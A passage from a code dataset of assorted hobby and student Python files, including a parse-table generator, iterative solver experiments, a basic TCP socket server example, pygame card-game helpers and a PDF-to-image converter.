h1_t_units = 1\r\n h2_t_units = 1\r\n M = 1\r\n\r\n with tf.variable_scope('h1_t'):\r\n weights = tf.get_variable('weights', shape=[])\r\n biases = tf.get_variable('biases', shape=[])\r\n h1_t = trajectories*weights + biases\r\n\r\n with tf.variable_scope('h2_t'):\r\n weights = tf.get_variable('weights', shape=[])\r\n biases = tf.get_variable('biases', shape=[])\r\n h2_t = h1_t*weights + biases\r\n\r\n with tf.variable_scope('h3_t'):\r\n weights = tf.get_variable('weights', shape=[])\r\n biases = tf.get_variable('biases', shape=[])\r\n h3_t = h2_t*weights + biases\r\n\r\n return h3_t\r\n\r\n\r\ng1 = tf.Graph()\r\nwith g1.as_default():\r\n input1 = tf.placeholder(dtype=tf.float32, name=\"input1\")\r\n input2 = tf.placeholder(dtype=tf.float32, name=\"input2\")\r\n with tf.variable_scope('traj_embedding') as scope:\r\n with tf.name_scope(\"leg1\"):\r\n embeddings_left = build_t_model(input1)\r\n scope.reuse_variables()\r\n with tf.name_scope(\"leg2\"):\r\n embeddings_right = build_t_model(input2)\r\n # for id, v in enumerate(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='traj_embedding')):\r\n # print((id, v))\r\n\r\nwith tf.Session(graph=g1) as sess:\r\n train_writer = tf.summary.FileWriter(\"./test/\", sess.graph)\r\n # tf.global_variables_initializer().run()\r\n for var in tf.trainable_variables(scope='traj_embedding'):\r\n if var._trainable:\r\n sess.run(tf.assign(var, 0))\r\n else:\r\n continue\r\n w, v = sess.run([embeddings_left, embeddings_right], feed_dict={input1: 0, input2: 0})","repo_name":"MaxKinny/kaggle_SMILE-Kinship-Recognizing","sub_path":"vggface2_inception_resnet_v1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"15254066689","text":"from numpy import *\nfrom PIL import Image\nfrom os import listdir\n\noutfile = open(\"src/sprites.json\", \"w\")\ntsfile = open(\"src/SpriteTypes.ts\", \"w\")\n\noutfile.write(\"{\\n\")\n\ntsfile.write(\"export enum SpriteTypes {\\n\")\n\nid = 0\n\nspriteCount = len(listdir(\"sprites\"))\nspriteCounter = 0\n\nfor file in listdir(\"sprites\"):\n spriteName = file.split(\".\")[0]\n if \"LOWER\" in spriteName:\n spriteName = spriteName.replace(\"LOWER\", \"\")\n elif \"UPPER\" in spriteName:\n spriteName = spriteName.replace(\"UPPER\", \"\")\n im = Image.open(\"sprites/\" + file)\n x = asarray(im)\n width = size(x, 1)\n height = size(x, 0)\n data = []\n for i in x:\n buf = []\n for j in i:\n try:\n buf.append(\"1\" if j[3] == 255 else \"0\")\n except Exception:\n print(\n \"File: \" + file + \" has an incorrect bit-depth, files must have a bit-depth of 32 bits.\")\n break\n data.append(buf)\n\n outfile.write('\\n\"' + str(id) + '\": {\\n')\n outfile.write('\"name\": \"' + spriteName + '\",\\n')\n id += 1\n outfile.write('\"width\": ' + str(width) + ',\\n')\n outfile.write('\"height\": ' + str(height) + ',\\n')\n outfile.write('\"data\": [\\n')\n count = 0\n for item in data:\n if (count == len(data) - 1):\n outfile.write('[' + \",\".join(item) + ']\\n')\n else:\n outfile.write('[' + \",\".join(item) + '],\\n')\n count += 1\n if (spriteCounter == spriteCount - 1):\n outfile.write(']\\n}\\n')\n tsfile.write(\"\\t\" + spriteName + \"\\n\")\n else:\n tsfile.write(\"\\t\" + spriteName + \",\\n\")\n outfile.write(']\\n},\\n')\n spriteCounter += 1\n im.close()\n\ntsfile.write(\"}\")\noutfile.write('\\n}')\noutfile.close()\ntsfile.close()\n","repo_name":"ObliviousReality/jacdac-lcd-dashboard","sub_path":"spritetojson.py","file_name":"spritetojson.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33520603084","text":"# coding=utf-8\n\"\"\"\nxxx\n\"\"\"\n__author__ = 'eendro'\n\nfrom Follow import Follow\n\n\n# noinspection PyDocstring\nclass ParseTable(object):\n \"\"\"\n \"\"\"\n\n def __init__(self):\n self.__followObj = Follow()\n self.__grammarObj = self.__followObj.get_grammar_object()\n self.__firstObj = self.__followObj.get_first_object()\n self.__variableList = self.__grammarObj.get_variables()\n self.__terminalList = self.__grammarObj.get_terminals()\n self.__parseTable = [{'variable': \"\", 'terminal': \"\", 'product': [[]]}]\n\n @staticmethod\n def __remove_duplicate(_list):\n temp = [{}]\n for i in _list:\n if not temp.__contains__(i):\n temp.append(i)\n temp.remove({})\n return temp\n\n def get_follow_object(self):\n return self.__followObj\n\n def get_first_object(self):\n return self.__firstObj\n\n def get_grammar_object(self):\n return self.__grammarObj\n\n def get_parse_table(self):\n return self.__parseTable\n\n def generate_parse_table(self):\n \"\"\"\n \"\"\"\n rules = self.__grammarObj.get_grammar_list()\n for eachRule in rules:\n for each in self.__firstObj.get_first_of(eachRule['product'][0]):\n if each == \"EFS\":\n self.__parseTable.append(\n {'variable': eachRule.get('variable'), 'terminal': \"$\", 'product': eachRule.get('product')})\n for eachF in self.__followObj.get_follow_of(eachRule.get('variable')):\n self.__parseTable.append({'variable': eachRule.get('variable'), 'terminal': eachF,\n 'product': eachRule.get('product')})\n\n else:\n self.__parseTable.append(\n {'variable': eachRule.get('variable'), 'terminal': each, 'product': eachRule.get('product')})\n\n self.__parseTable = self.__remove_duplicate(self.__parseTable)\n self.__parseTable.remove({'variable': \"\", 'terminal': \"\", 'product': [[]]})\n\n return self\n\n def print_parse_table(self):\n for each in self.__parseTable:\n print (each)\n return self\n\n def print_to_file(self):\n output = open(\"parseTable.txt\", \"w+\")\n _list = self.__terminalList\n _list.append(\"$\")\n for eachV in self.__variableList:\n output.write(\"-------------------------------------------------------\\n\" + eachV + \"\\n\")\n\n for eachT in _list:\n for eachR in self.__parseTable:\n if not eachR.get('variable') == eachV:\n continue\n if not eachR.get('terminal') == eachT:\n continue\n output.write(\"\\t\\t-----------------------------------------------\\n\\t\\t->\" + eachT + \"\\n\\t\\t\\t\\t \")\n for eachS in eachR.get('product'):\n output.write(eachS + \" \")\n output.write(\"\\n\")\n output.write(\"-------------------------------------------------------\")\n output.close()\n\n\nfl = Follow()\n\nfl.get_grammar_object().print_grammar_file()\n\nprint\nprint\n\nfl.get_first_object().print_first()\n\nprint\nprint\n\nfl.print_follow_list()\n\nprint\nprint\n\nParseTable().generate_parse_table().print_parse_table()\nParseTable().generate_parse_table().print_to_file()\n","repo_name":"eendroroy/nrpp","sub_path":"parseTable.py","file_name":"parseTable.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41632497144","text":"import numpy as np\nfrom scipy.sparse import random\nimport scipy.sparse as sparse\nimport matplotlib.pyplot as plt\n\n\n# Question 1\ndef general_iterative_Iter(A, x, b, M, N, weight):\n building_convergence_graph = []\n for i in range(100):\n x = x + weight * np.linalg.inv(M).dot(b - A.dot(x))\n building_convergence_graph.append((i + 1, np.linalg.norm((A.dot(x) - b))))\n # print(np.linalg.norm((A.dot(x) - b)))\n # print(np.linalg.norm((A.dot(x) - b)) / (np.linalg.norm(b)))\n # if ((np.linalg.norm((A.dot(x) - b)) / (np.linalg.norm(b))) < 0.1):\n # pass\n return building_convergence_graph\n\n\ndef jacobi(A, b):\n M = np.eye(A[0].size)\n for i in range(A[0].size):\n M[i][i] = A[i][i]\n N = A - M\n x = np.zeros(A[0].size)\n return (general_iterative_Iter(A, x, b, M, N,0.36))\n\n\ndef gauss_Seid(A, b):\n M = np.eye(A[0].size)\n for i in range(A[0].size):\n for j in range(A[0].size):\n if (j >= i):\n M[i][j] = A[i][j]\n N = A - M\n x = np.zeros(A[0].size)\n return (general_iterative_Iter(A, x, b, M, N, 1))\n\n\ndef gradient_descent(A, b):\n x = np.zeros(A[0].size)\n building_convergence_graph = []\n r = b - A.dot(x)\n for i in range(100):\n # print(x)\n alpha = (r.transpose().dot(r)) / (r.transpose().dot(A.dot(r)))\n x = x + alpha * r\n r = b - A.dot(x)\n building_convergence_graph.append((i + 1, np.linalg.norm(r)))\n # if r.transpose().dot(r) < 0.0001:\n # if ((np.linalg.norm((A.dot(x) - b)) / (np.linalg.norm(b))) < 0.001):\n # pass\n return building_convergence_graph\n\n\ndef conjugate_Gradient(A, b):\n x = np.zeros(A[0].size)\n building_convergence_graph = []\n r = b - A.dot(x)\n p = r\n for i in range(100):\n alpha = (r.transpose().dot(r)) / (p.transpose().dot(A.dot(p)))\n x_old = x\n x = x + alpha * p\n old_r = r\n r = b - A.dot(x)\n # if r.transpose().dot(r) < 0.0001:\n beta = (r.transpose().dot(r)) / (old_r.transpose().dot(old_r))\n p = r + beta * p\n building_convergence_graph.append((i + 1, np.linalg.norm(r)))\n return building_convergence_graph\n\n\ndef graphs(A, b):\n graph_points_jacobi = jacobi(A, b)\n graph_points_gauss_Seid = gauss_Seid(A, b)\n graph_points_gradient_descent = gradient_descent(A, b)\n graph_points_conjugate_Gradient = conjugate_Gradient(A, b)\n\n x = [i + 1 for i in range(100)]\n\n y_jacobi = [i[1] for i in graph_points_jacobi]\n build_graph_residual(x, y_jacobi, \"Jacobi method residual\")\n y_gauss_Seid = [i[1] for i in graph_points_gauss_Seid]\n build_graph_residual(x, y_gauss_Seid, \"gauss_Seid method residual\")\n y_gradient_descent = [i[1] for i in graph_points_gradient_descent]\n build_graph_residual(x, y_gradient_descent, \"gradient_descent method residual\")\n y_conjugate_Gradient = [i[1] for i in graph_points_conjugate_Gradient]\n build_graph_residual(x, y_conjugate_Gradient, \"conjugate_Gradient method residual\")\n\n build_graph_convergence_rate(x, y_jacobi, \"Jacobi method convergence rate\")\n build_graph_convergence_rate(x, y_gauss_Seid, \"gauss_Seid_residual method convergence rate\")\n build_graph_convergence_rate(x, y_gradient_descent, \"gradient_descent method convergence rate\")\n build_graph_convergence_rate(x, y_conjugate_Gradient, \"conjugate_Gradient method convergence rate\")\n\n\ndef build_graph_residual(x, y, name):\n plt.xlabel('iter num')\n plt.ylabel('residual')\n\n plt.title(name)\n\n plt.semilogy(x, y, label='Residual')\n plt.legend()\n plt.show()\n pass\n\n\ndef build_graph_convergence_rate(x, y, name):\n plt.xlabel('iter num')\n plt.ylabel('ratio')\n\n plt.title(name)\n\n for i in range(len(y) - 1):\n y[i] = y[i + 1] / y[i]\n y[len(y)-1] = y[len(y)-2]\n plt.plot(x, y, label='Convergence rate')\n plt.legend()\n plt.show()\n\n\ndef main():\n n = 256\n A = random(n, n, 5 / n, dtype=float)\n v = np.random.rand(n)\n v = sparse.spdiags(v, 0, v.shape[0], v.shape[0], 'csr')\n A = A.transpose() * v * A + 0.1 * sparse.eye(n)\n A = A.toarray()\n b = np.random.rand(256, 1)\n # print(gauss_Seid(A,b))\n # print(gradient_descent(A,b))\n # print(conjugate_Gradient(A,b))\n graphs(A, b)\n\n\nif __name__ == '__main__':\n main()\n\n# #Question 3 Section C\n# def gradient_descent(A, b):\n# x = np.zeros(A[0].size)\n# r = b - A.dot(x)\n# for i in range(100):\n# print(x)\n# alpha = (r.transpose().dot(r)) / (r.transpose().dot(A.dot(r)))\n# x = x + alpha * r\n# r = b - A.dot(x)\n# # if r.transpose().dot(r) < 0.0001:\n# if ((np.linalg.norm((A.dot(x) - b)) / (np.linalg.norm(b))) < 0.001):\n# return x\n# break\n# check for question 1.a\n# A = np.array([[2, 1, 2], [1, 7, 1], [1, 2, 3]])\n# AA=A.transpose()@A\n# print(AA@np.array([1,2,3]))\n# b = np.array([10, 18, 14])\n# bb= np.array([52, 164, 80])\n#\n","repo_name":"Nivhaham/Optimization_methods","sub_path":"ass2/Section_1.py","file_name":"Section_1.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16806048804","text":"from socket import *\n\n\n# 创建套接字\nprepare = socket(AF_INET, SOCK_STREAM)\n# 绑定服务端地址\nprepare.bind(('0.0.0.0', 8888))\n# 设置监听套接字\nprepare.listen(5)\n# 等待客户端链接\nprint('Waiting for input...')\nuser_input, add = prepare.accept()\n# 消息收发\n# 设置传入字符的长度\ndata = user_input.recv(2048) # 此处输出位字节串\n# 转换为字符串\nprint(data.decode(), add)\n\n# 返回客户端信息\nn = user_input.send(b'Already get your message')\n# 关闭套接字\nprepare.close()\nuser_input.close()\n","repo_name":"demo112/1807","sub_path":"PythonNet/day01/teach_day1/TCP_SERVER/self_work.py","file_name":"self_work.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4300010089","text":"import nltk\nnltk.download('stopwords')\nfrom nltk import bigrams\nfrom nltk.probability import FreqDist, ConditionalFreqDist\nfrom nltk.corpus import stopwords\n\nclass CriticalAnalysis:\n def Score(listIs):\n initial = \"\"\n\n for paper in listIs:\n if paper['abstract'] != None:\n initial += paper['abstract']\n\n initial = initial.lower()\n initial = initial.replace('-', '')\n initial = initial.replace('.', '')\n initial = initial.replace(',', '')\n\n # Prepare the text data\n \n word_tokens = initial.split(' ')\n\n stop_words = set(stopwords.words('english'))\n\n filtered_sentence = [w for w in word_tokens if not w.lower() in stop_words]\n\n text = ' '.join(filtered_sentence)\n # Convert the text into a list of words\n words = nltk.word_tokenize(text)\n\n # Generate the bigrams from the words\n bigram_list = list(bigrams(words))\n\n # Create a frequency distribution of the bigrams\n bigram_freq = FreqDist(bigram_list)\n\n # Create a conditional frequency distribution of the bigrams\n bigram_cond_freq = ConditionalFreqDist([(w1, w2) for w1, w2 in bigram_list])\n\n # Calculate the probability of a word giv0en its previous word\n listIs = text.split(' ')\n dict_prob = {}\n for i in range(len(listIs)-1):\n if(text.count(listIs[i]) > 6 and len(listIs[i]) > 3 and bigram_cond_freq[listIs[i]].freq(listIs[i+1]) != 1):\n dict_prob[f\"{listIs[i]} {listIs[i+1]}\"] = bigram_cond_freq[listIs[i]].freq(listIs[i+1])\n\n dict_prob = list(sorted(dict_prob.items(), key = lambda kv: (kv[1]), reverse=True))\n listIs = []\n for i in range(10):\n listIs.append(dict_prob[i][0])\n return {\"queryparams\": listIs}\n","repo_name":"iSmart-Research-Scholar/CriticalAnalysis","sub_path":"CriticalAnalysis/CriticalAnalysis.py","file_name":"CriticalAnalysis.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9258099790","text":"import controller\nimport pickle\nimport os\n\nclass PersistUploader:\n def __init__(self, picklefile=os.path.join(\"persist_data\", \"persist_picklefile\")):\n self.filename = picklefile\n self.controller = controller.MockedUploaderController()\n\n def add_new_item(self, item):\n with open(self.filename, \"ab\") as fp:\n pickle.dump(item, fp)\n\n def load_items(self):\n data = []\n if os.path.exists(self.filename):\n with open(self.filename, 'rb') as fr:\n try:\n while True:\n data.append(pickle.load(fr))\n except EOFError:\n pass\n\n return data\n\n def upload_items(self):\n items = self.load_items()\n print(f\"{len(items)} items were set to be monitored for uploading.\"\n f\" checking if items were modified and updating if required.\")\n\n uploaded_items = []\n for item in items:\n src = item[\"Source_folder\"]\n dest = item[\"Destination_bucket\"]\n regex = item[\"Regex\"]\n item_tuple = (src, dest, regex)\n if item_tuple not in uploaded_items:\n self.controller.upload_item(item, \"celery\")\n uploaded_items.append(item_tuple)\n else:\n print(f\"{item_tuple} already uploaded in this interval\")\n","repo_name":"llivne/ultima","sub_path":"persist.py","file_name":"persist.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1694928070","text":"from turtle import window_height\nimport pygame\nimport os\n\nimport asyncio\n\nimport types\n\nimport time\n\nFPS = 60\n\nWIN_WIDTH, WIN_HEIGHT = 1920, 1080\n\n\n#----DECK----#\nDECK_SIZE = 30\n\n\n#----HOVER----#\nHOVER_RATIO = 1.5\n\n#----CARD DIMENSIONS----#\nCARD_WIDTH, CARD_HEIGHT = 600, 800\n#HAND\nRATIO_HAND = 3/10\nCARD_WIDTH_HAND, CARD_HEIGHT_HAND = CARD_WIDTH*RATIO_HAND, CARD_HEIGHT*RATIO_HAND\n\n#DECK_BUILD\nFULL_RES_RATIO = 2.5\n\n\n#----MULLIGAN----#\nMULLIGAN_X, MULLIGAN_Y = 100, 100\n\nMULLIGAN_RATIO = 2\nCARD_WIDTH_MULLIGAN, CARD_HEIGHT_MULLIGAN = CARD_WIDTH_HAND * MULLIGAN_RATIO, CARD_HEIGHT_HAND * MULLIGAN_RATIO\n\n\n#----HAND----#\nMAX_HAND_SIZE = 10\n\nHAND_SPACING = CARD_WIDTH_HAND / 3\n\nHAND_X, HAND_Y0, HAND_Y1 = 40, 1080 - CARD_HEIGHT_HAND, 0\nHAND_Y = HAND_Y0, HAND_Y1\n\n\n#----DRAG----#\nDRAG_FROM_HAND = 1\nDRAG_FROM_FIELD = 2\n\n\n#----FIELD----#\nMAX_FIELD_SIZE = 8\n\nFIELD_WIDTH, FIELD_HEIGHT = CARD_WIDTH_HAND * MAX_FIELD_SIZE, CARD_HEIGHT_HAND * 2\n\nFIELD_X, FIELD_Y = 200, [300 + CARD_HEIGHT_HAND, 300]\n\nFIELD_SPACING = CARD_WIDTH_HAND # + CARD_WIDTH_HAND/2\n\n\n#----BUTTONS----#\nEND_TURN_WIDTH, END_TURN_HEIGHT = 100, 25\n\nCONFIRM_WIDTH, CONFIRM_HEIGHT = 800, 200\nCONFIRM_X, CONFIRM_Y = WIN_WIDTH / 2 - CONFIRM_WIDTH / 2, WIN_HEIGHT - CONFIRM_HEIGHT\n\n\n#----MISC----#\nDECK_WIDTH, DECK_HEIGHT = 180, 240\nDECK_X, DECK_Y = 1920 - DECK_WIDTH, [1080 - DECK_HEIGHT, 0]\n\n#----STATS----#\nCOST, ATK, HP = 0, 1, 2\n\n\n#----PLAYER----#\nPLAYER_FRAME_WIDTH, PLAYER_FRAME_HEIGHT = 240, 300\nPLAYER_FRAME_X, PLAYER_FRAME_Y = DECK_X - PLAYER_FRAME_WIDTH, [1080 - PLAYER_FRAME_HEIGHT, 0]\n\nPLAYER_CARD_OFFSET_X, PLAYER_CARD_OFFSET_Y = -30, [ - CARD_HEIGHT_HAND * HOVER_RATIO, CARD_HEIGHT_HAND * HOVER_RATIO]\n\n\n#--DRINKS--#\nDRINK_WIDTH, DRINK_HEIGHT = 30, 30\nDRINK_START_X, DRINK_START_Y = PLAYER_FRAME_X - DRINK_WIDTH, [1080 - DRINK_HEIGHT, 0]\nDRINK_TOTAL_START_X = DRINK_START_X - 115\n\nDRINK_TEXT_HEIGHT = 45\nDRINK_TOTAL_START_Y = [1080 - DRINK_TEXT_HEIGHT, 0]\n\nMAX_DRINKS = 10\n\n\n#----HISTOGRAM----#\nHIST_WIDTH, HIST_HEIGHT = 30, 30\nHIST_X_SPACER = 60\nHIST_X, HIST_Y = 500, WIN_HEIGHT - 60\n\n\n#----CHANNEL POINTS----#\nPOINTS_PER_DRAW = 100\nPOINTS_PER_HP = 200\nPOINTS_PER_ATK = 100\n\n\n\ndef load_image(local_dir, w, h):\n img = pygame.image.load(os.path.join(\"Assets\", local_dir))\n return pygame.transform.smoothscale(img, (w, h))\n\n\ndef draw_card(app, card, ratio = 1, custom_x = None, custom_y = None, alpha = None, nostat = False, from_hand = False):\n '''draw a card on the window, with optional ratio'''\n\n if not card.animating:\n #update img\n card.img = pygame.transform.smoothscale(card.fullresimg, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n card.img.set_alpha(alpha)\n\n #if no custom coords given, draw at object position\n if not custom_x:\n pos = card.pos.copy()\n\n #otherwise draw at custom position\n else:\n pos = [custom_x, custom_y]\n\n \n #----BORDERS----#\n\n #draw mulligan select\n if card.mulligan:\n img = pygame.transform.smoothscale(app.highlight_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n img.set_alpha(alpha)\n app.WIN.blit(img, pos)\n\n \n \n\n #draw highlight\n if (card.energy > 0 and card.stats[ATK] > 0) or card.playable:\n img = pygame.transform.smoothscale(app.highlight_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n img.set_alpha(alpha)\n app.WIN.blit(img, pos)\n\n #draw stuck\n if card.stuck:\n img = pygame.transform.smoothscale(app.stuck_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n img.set_alpha(alpha)\n app.WIN.blit(img, pos)\n\n #draw limbo highlight\n if card == app.limbo:\n #draw self.limbo border\n img = pygame.transform.smoothscale(app.limbo_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n img.set_alpha(alpha)\n app.WIN.blit(img, pos)\n\n \n\n #draw card itself\n app.WIN.blit(card.img, pos)\n\n\n #draw steadfast\n if card.steadfast:\n img = pygame.transform.smoothscale(app.steadfast_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n if alpha:\n img.set_alpha(alpha)\n app.WIN.blit(img, pos)\n\n #draw stats\n if not nostat:\n if ratio == MULLIGAN_RATIO:\n draw_stats(app, card, pos, mulligan = ratio, alpha = alpha)\n\n else:\n draw_stats(app, card, pos, alpha = alpha)\n\n #draw shield\n if card.shield:\n img = pygame.transform.smoothscale(app.shield_img_fullres, (CARD_WIDTH_HAND*ratio, CARD_HEIGHT_HAND*ratio))\n\n if alpha:\n img.set_alpha(alpha)\n\n app.WIN.blit(img, pos)\n\n\n\ndef draw_stats(app, card, pos, build = None, mulligan = None, alpha = None, from_hand = False):\n for stat, val in enumerate(card.stats):\n\n #if stat is blank, skip\n if val == \"\":\n continue\n\n if card.hover:\n # print(from_hand)\n ratio = HOVER_RATIO\n\n if not card.played:\n if card.owner:\n x_offset0 = -9\n y_offset0 = 25\n x_offset1 = -15\n y_offset1 = 40\n x_offset2 = 63\n y_offset2 = y_offset1\n\n else:\n x_offset0 = -9\n y_offset0 = -50\n x_offset1 = -15\n y_offset1 = 120\n x_offset2 = 63\n y_offset2 = y_offset1\n\n \n else:\n x_offset0 = -9\n y_offset0 = -17\n x_offset1 = -15\n y_offset1 = 77\n x_offset2 = 63\n y_offset2 = y_offset1\n\n \n elif build:\n ratio = build\n\n x_offset0 = 30\n y_offset0 = 50\n x_offset1 = 25\n y_offset1 = -40\n x_offset2 = -20\n y_offset2 = -40\n\n \n elif mulligan:\n ratio = mulligan\n\n x_offset0 = 23\n y_offset0 = 30\n x_offset1 = 16\n y_offset1 = 33\n x_offset2 = 32\n y_offset2 = y_offset1\n\n\n else:\n ratio = 1\n\n x_offset0 = 15\n y_offset0 = 10\n x_offset1 = 10\n y_offset1 = 45\n x_offset2 = 40\n y_offset2 = 50\n\n if stat == 0:\n x = card.pos[0] + (x_offset0) * ratio\n y = card.pos[1] + (y_offset0) * ratio\n\n #for drawing owner label\n owner_label_x = x\n owner_label_y = y\n \n elif stat == 1:\n x = card.pos[0] + (x_offset1) * ratio\n y = card.pos[1] + (CARD_HEIGHT_HAND - y_offset1) * ratio\n\n elif stat == 2:\n x = card.pos[0] + (CARD_WIDTH_HAND - x_offset2) * ratio\n y = card.pos[1] + (CARD_HEIGHT_HAND - y_offset2) * ratio\n\n if alpha:\n card.statsimgs[stat].set_alpha(alpha)\n\n else:\n card.statsimgs[stat].set_alpha(255)\n\n app.WIN.blit(card.statsimgs[stat], (x, y))\n\n #draw owner label\n #generate image from font\n colour = (255,255,255)\n chat_owner_img = app.chat_owner_font.render(card.chat_owner, True, colour)\n app.WIN.blit(chat_owner_img, (owner_label_x, owner_label_y))\n\n\ndef hover_card(card, ratio, if_hand = False):\n '''enlarge a card, primarily while mouse is hovering over it'''\n\n #make card look centered compared to unhovered image center\n x = card.pos[0] - (CARD_WIDTH_HAND*ratio - CARD_WIDTH_HAND) / 2\n\n if not if_hand:\n y = card.pos[1] - (CARD_HEIGHT_HAND*ratio - CARD_HEIGHT_HAND) / 2\n else:\n y = card.pos[1] - (1 - card.owner) * (CARD_HEIGHT_HAND*ratio - CARD_HEIGHT_HAND)\n\n # y = card.pos[1] - (CARD_HEIGHT_HAND*ratio - CARD_HEIGHT_HAND) / 2\n\n return [x, y]\n\n\ndef update_cardpos(card, x, y):\n card.pos[0] = x\n card.pos[1] = y\n card.rect.update(card.pos, (CARD_WIDTH_HAND, CARD_HEIGHT_HAND))\n\n\ndef set_targets(app, vals = None):\n\n #if no custom vals given, just reset targets\n if not vals:\n #friendly cards targetable\n app.fcard = 1\n #enemy cards untargetable\n app.ecard = 0\n #player targetable\n app.pcard = 1\n\n else:\n app.fcard = vals[0]\n app.ecard = vals[1]\n app.pcard = vals[2]\n\n\ndef heal_target(app, dmg, card = None, player = None):\n '''heal a target player or card, return true if healing was done or false if card wasn't even damaged'''\n healed = False\n if card:\n #calculate hp difference\n difference = card.statsbase[HP] - card.stats[HP]\n\n if difference > 0:\n dmg = min(dmg, difference)\n card.update_stats(HP, dmg, app.font)\n\n healed = True\n\n else:\n pass\n\n elif player:\n #calculate hp difference\n difference = player.hpbase - player.hp\n\n if difference > 0:\n dmg = min(dmg, difference)\n player.update_hp(dmg, app.font)\n\n healed = True\n\n else:\n pass\n\n return healed\n\n\nasync def add_points(app, viewer, amount):\n '''add SE channel points through stream'''\n #award points to viewer who owns card\n await app.chan.send(f\"!addpoints {viewer} {amount}\")","repo_name":"MichaelBong420/TCGShare","sub_path":"_helper_functions.py","file_name":"_helper_functions.py","file_ext":"py","file_size_in_byte":9410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19120452041","text":"# coding:utf-8\nfrom wand.image import Image\nimport os\n\n# 将pdf文件转为jpg图片文件\n# ./PDF_FILE_NAME 为pdf文件路径和名称\nfiledir = '/home/xu-p/PycharmProjects/pdf2img/data'\nsavedir = '/home/xu-p/PycharmProjects/pdf2img/result'\nlist = os.listdir(filedir)\nfor i in range(0,len(list)):\n filename = os.path.join(filedir,list[i])\n if os.path.isfile(filename):\n _savedir = os.path.join(savedir,list[i])\n if os.path.exists(_savedir):\n continue\n os.mkdir(_savedir)\n image_pdf = Image(filename=filename, resolution=300)\n image_jpeg = image_pdf.convert('jpg')\n\n # wand已经将PDF中所有的独立页面都转成了独立的二进制图像对象。我们可以遍历这个大对象,并把它们加入到req_image序列中去。\n req_image = []\n for img in image_jpeg.sequence:\n img_page = Image(image=img)\n req_image.append(img_page.make_blob('jpg'))\n\n # 遍历req_image,保存为图片文件\n i = 0\n for img in req_image:\n saveFileName = str(i) + '.jpg'\n savepath = os.path.join(_savedir,saveFileName)\n ff = open(savepath, 'wb')\n ff.write(img)\n ff.close()\n i += 1","repo_name":"panxu18/doc-dewraping","sub_path":"dataprovide/pdf2img.py","file_name":"pdf2img.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74809979450","text":"\nimport pygame\nscreenW, screenH = (700, 500)\nscreen = pygame.display.set_mode((screenW, screenH))\n\nimport sys\nsys.path.append(\"C:\\\\Users\\\\Luke\\\\Documents\\\\Learning Python\\\\\")\nimport LukeLibrary as LL\n\nfrom random import randint\n\nfrom math import pi, cos, sin, atan2, exp\n\nrobotTurnRate = 0.1 # \nrobotSpeed = 1 # How fast the robot moves through the corridor\ncorridorWidth = screenH * 0.5 # How wide the corridor is\ncorridorSegmentCount = 8 # The number of corridor segments before looping\nnoiseLength = int(corridorSegmentCount * robotSpeed) # The number of values in the noise list\ncorridorStartYNoise = LL.generate1DNoise(noiseLength, noiseScale=1.0, precisionDP=4, noiseMin=0.0, noiseMax=1.0, smooth=False) # \n# corridorStartYNoise = [LL.randomFloat(0.1, 0.9) for _ in range(noiseLength)]\nnoiseMax = max(corridorStartYNoise)\nnoiseMin = min(corridorStartYNoise)\nnoiseRange = noiseMax - noiseMin\n\n# print(f\"noise: {corridorStartYNoise}\")\n\nclass Wall:\n def __init__(self, side, startNoiseIndex):\n self.side = side\n self.start = LL.Vector()\n self.end = LL.Vector()\n self.colour = (0,0,0) # (randint(0, 255), randint(0, 255), randint(0, 255))\n self.noiseIndex = startNoiseIndex\n\n self.setStartEnd()\n \n def setStartEnd(self, firstCall=True):\n\n startY = screenH * corridorStartYNoise[self.noiseIndex]\n endY = screenH * corridorStartYNoise[(self.noiseIndex+1) % noiseLength]\n\n dx = screenW\n dy = endY - startY\n angle = atan2(dy, dx)\n # print(f\"side:{self.side}, dx:{dx}, dy:{dy}, angle:{angle}\")\n\n leftWallMid = LL.Vector(\n (screenW/2) + (cos(angle-(pi/2)) * corridorWidth * 0.5),\n (screenH/2) + (sin(angle-(pi/2)) * corridorWidth * 0.5)\n )\n\n rightWallMid = LL.Vector(\n (screenW/2) + (cos(angle+(pi/2)) * corridorWidth * 0.5),\n (screenH/2) + (sin(angle+(pi/2)) * corridorWidth * 0.5)\n )\n\n wallWidth = screenW * 0.3\n wallHeight= screenH * 0.3\n\n if self.side == 'L':\n self.start = LL.Vector(\n leftWallMid.x - (cos(angle) * wallWidth),\n leftWallMid.y - (sin(angle) * wallHeight)\n )\n self.end = LL.Vector(\n leftWallMid.x + (cos(angle) * wallWidth),\n leftWallMid.y + (sin(angle) * wallHeight)\n )\n elif self.side == 'R':\n self.start = LL.Vector(\n rightWallMid.x - (cos(angle) * wallWidth),\n rightWallMid.y - (sin(angle) * wallHeight)\n )\n self.end = LL.Vector(\n rightWallMid.x + (cos(angle) 